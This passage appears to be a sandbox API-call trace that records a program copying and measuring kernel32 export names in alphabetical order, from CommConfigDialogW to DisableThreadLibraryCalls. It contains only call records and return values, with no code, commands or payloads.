lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.447] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.447] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.447] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.448] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.448] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.448] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.448] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.448] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.448] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.448] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.448] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.448] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.448] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.448] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.448] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.448] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.448] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.448] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.448] lstrlenA (lpString="COPYFILEA") returned 9 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.448] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.448] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.449] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.449] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.449] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.449] lstrlenA (lpString="COPYFILEW") returned 9 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.449] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.449] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.449] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.449] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.449] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.449] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.449] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.449] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.449] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.449] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.449] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.449] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.449] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.449] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.450] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.450] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.450] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.450] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.450] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.450] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.450] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.450] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.450] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.450] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.450] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.450] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.450] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.450] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.450] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.450] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.450] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.450] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.450] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.451] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.451] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.451] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.451] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.451] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.451] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.451] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.451] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.451] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.451] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.451] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.451] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.451] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.451] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.451] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.451] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.451] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.451] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.451] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.452] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.452] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.452] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.452] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.452] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.452] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.452] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.452] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.452] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.452] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.452] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.452] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.452] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.452] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.452] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.452] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.452] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.452] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.452] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.453] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.453] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.453] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.453] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.453] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.453] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.453] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.453] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.453] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.453] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.453] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.453] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.453] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.453] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.453] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.453] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.453] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.453] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.454] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.454] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.454] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.454] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.454] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.454] lstrlenA (lpString="DELETEATOM") returned 10 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.454] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.454] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.454] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.454] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.454] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.454] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.454] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.454] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.454] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.454] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.454] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.454] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.454] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.455] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.455] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.455] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.455] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 